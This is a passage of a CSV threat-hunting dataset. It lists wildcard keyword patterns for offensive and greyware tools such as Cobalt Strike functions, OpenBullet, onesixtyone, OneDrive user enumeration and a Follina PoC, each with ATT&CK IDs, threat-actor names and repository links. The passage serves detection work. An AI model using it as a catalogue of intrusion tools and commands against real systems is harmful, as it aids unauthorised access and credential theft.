TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*OnDemandC2Class.cs*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*onecloudemoji/CVE-2022-30190*,offensive_tool_keyword,POC,CVE-2022-30190 Follina POC,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/onecloudemoji/CVE-2022-30190,1,1,N/A,N/A,2,107,33,2022-05-31T09:35:37Z,2022-05-31T06:45:25Z -*OneDrive Enumerator*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*onedrive_enum.py*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*onedrive_exports_version_dll.txt*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*onedrive_user_enum.git*,offensive_tool_keyword,onedrive_user_enum,enumerate valid onedrive users,T1087 - T1110,TA0006,N/A,N/A,Network Exploitation tools,https://github.com/nyxgeek/onedrive_user_enum,1,1,N/A,N/A,5,490,73,2023-09-21T06:52:07Z,2019-03-05T08:54:38Z -*One-Lin3r*,offensive_tool_keyword,One-Lin3r,One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).,T1059 - T1003 - T1053,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/D4Vinci/One-Lin3r,1,1,N/A,N/A,10,1596,307,2022-02-10T18:17:57Z,2018-01-14T21:26:04Z -*onesixtyone -c *snmp_default_pass.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*onesixtyone -c *wordlists/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*onesixtyone -i * -c*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,0,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*onesixtyone.1*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*onesixtyone.git*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*OnionScan*,offensive_tool_keyword,onionscan,OnionScan has two primary goals: We want to help operators of hidden services find and fix operational security issues with their services. We want to help them detect misconfigurations and we want to inspire a new generation of anonymity engineering projects to help make the world a more private place. Secondly we want to help researchers and investigators monitor and track Dark Web sites. In fact we want to make this as easy as possible. Not because we agree with the goals and motives of every investigation force out there - most often we don't. But by making these kinds of investigations easy. we hope to create a powerful incentive for new anonymity technology,T1589 - T1591 - T1596 - T1599,TA0011 - TA0012,N/A,N/A,Information Gathering,https://onionscan.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*oofgbpoabipfcfjapgnbbjjaenockbdp*,greyware_tool_keyword,SetupVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ookhnhpkphagefgdiemllfajmkdkcaim*,greyware_tool_keyword,iNinja VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*openBeaconBrowser*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openBeaconBrowser*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openBeaconConsole*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openBeaconConsole*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openbsd_softraid2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*OpenBullet.csproj*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.exe*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.pdb*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.sln*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*openbullet/openbullet*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBullet2.Console.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2.Native.exe*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2.Native.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2.zip*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*openbullet2:latest*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBullet2-master*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,1,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*OpenBulletApp.cs*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBulletCLI.csproj*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*OpenBulletCLI.exe*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*openbullet-master*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,1,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*openBypassUACDialog*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openBypassUACDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*opencubicles/h8mail*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,1,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*OPENCYBER-FR/RustHound*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*openGoldenTicketDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openKeystrokeBrowser*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openPayloadGenerator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*openPayloadGeneratorDialog*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openPayloadHelper*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*openPortScanner*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 